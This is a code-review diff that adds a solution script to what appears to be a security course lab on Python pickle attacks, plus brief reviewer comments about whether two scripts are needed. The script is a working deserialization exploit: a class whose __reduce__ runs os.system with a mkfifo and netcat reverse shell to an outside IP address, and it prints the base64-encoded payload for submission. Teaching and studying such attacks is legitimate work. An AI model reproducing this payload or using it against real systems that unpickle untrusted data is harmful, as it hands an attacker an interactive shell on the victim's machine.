08-exotic-attacks/activities/jar-of-pickles/sol/ex.py

```diff
@@ -0,0 +1,17 @@
+import pickle
+import base64
+import os
+
+class RCE:
+    def __reduce__(self):
+        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '
+               '/bin/sh -i 2>&1 | nc 86.126.24.38 1234 > /tmp/f')
+        # cmd = ('ls')
+        return os.system, (cmd,)
+
+if __name__ == '__main__':
+    pickled = pickle.dumps(RCE())
+    bb = (base64.urlsafe_b64encode(pickled).decode("utf-8"))
+    print(bb)
+    # data = base64.urlsafe_b64decode(bb)
```

Comment:
Should we have 2 scripts here?
I don't have the source code to check.

Reply:
The solution is not complete, it's more complex since it requires a reverse shell and might be needing 2 scripts indeed, will work on it soon.

Reply:
@gabrielmocanu done